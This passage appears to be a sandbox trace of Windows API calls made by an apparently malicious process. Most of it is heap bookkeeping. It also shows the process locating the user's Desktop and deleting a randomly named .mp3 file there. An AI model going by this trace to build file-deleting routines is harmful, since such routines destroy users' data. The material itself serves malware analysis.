[0132.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0132.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0132.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0132.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0132.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0132.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0132.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0132.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0132.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0132.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0132.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0132.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0132.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0132.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0132.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0132.782] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0132.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0132.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0132.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0132.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0132.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0132.783] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0132.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0132.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0132.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0132.783] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0132.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0132.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0132.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0132.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0132.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0132.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.783] FreeLibrary (hLibModule=0x756e0000) returned 1 [0132.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0132.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0132.783] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0132.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0132.783] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0132.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0132.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0132.783] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0132.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0132.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0132.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0132.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0132.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0132.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0132.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0132.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0132.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0132.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0132.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0132.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0132.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0132.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0132.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0132.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0132.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0132.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0132.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0132.784] CloseHandle (hObject=0x2d0) returned 1 [0132.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0132.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0132.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f26008 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0132.786] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0132.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0132.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0132.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0132.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0132.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0132.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0132.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0132.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0132.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0132.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0132.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0132.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0132.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0132.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0132.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0132.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0132.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0132.787] CloseHandle (hObject=0x2a0) returned 1 [0132.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0132.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0132.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f36010 | out: hHeap=0x970000) returned 1 [0132.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0132.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0132.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0132.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0132.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0132.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0132.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0132.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0132.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0132.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0132.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0132.790] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0132.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0132.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0132.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0132.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0132.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0132.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0132.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0132.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0132.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0132.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0132.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0132.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0132.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0132.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0132.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0132.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0132.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f46018 | out: hHeap=0x970000) returned 1 [0132.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0132.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0132.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0132.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0132.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0132.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0132.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0132.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0132.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0132.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0132.794] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0132.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0132.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0132.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0132.795] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0132.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0132.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0132.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0132.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0132.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0132.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0132.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0132.795] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/3cV5UrNf8.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\3cV5UrNf8.mp3", lpFilePart=0x8cedf4*="3cV5UrNf8.mp3") returned 0x25 [0132.795] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\3cV5UrNf8.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\3cv5urnf8.mp3")) returned 0x20 [0132.796] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\3cV5UrNf8.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56751600, ftCreationTime.dwHighDateTime=0x1d5e2f0, ftLastAccessTime.dwLowDateTime=0xb3866f0, ftLastAccessTime.dwHighDateTime=0x1d5e86e, ftLastWriteTime.dwLowDateTime=0xb3866f0, ftLastWriteTime.dwHighDateTime=0x1d5e86e, nFileSizeHigh=0x0, nFileSizeLow=0x1309, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="3cV5UrNf8.mp3", cAlternateFileName="3CV5UR~1.MP3")) returned 0xa87250 [0132.796] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\3cV5UrNf8.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\3cv5urnf8.mp3")) returned 1 [0132.856] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56751600, ftCreationTime.dwHighDateTime=0x1d5e2f0, ftLastAccessTime.dwLowDateTime=0xb3866f0, ftLastAccessTime.dwHighDateTime=0x1d5e86e, ftLastWriteTime.dwLowDateTime=0xb3866f0, ftLastWriteTime.dwHighDateTime=0x1d5e86e, nFileSizeHigh=0x0, nFileSizeLow=0x1309, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="3cV5UrNf8.mp3", cAlternateFileName="3CV5UR~1.MP3")) returned 0 [0132.856] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0132.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0132.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0132.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0132.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0132.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0132.856] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0132.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0132.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0132.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0132.857] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0132.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0132.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0132.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0132.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0132.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0132.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0132.857] RtlAllocateHeap (HeapHandle=0x970000, 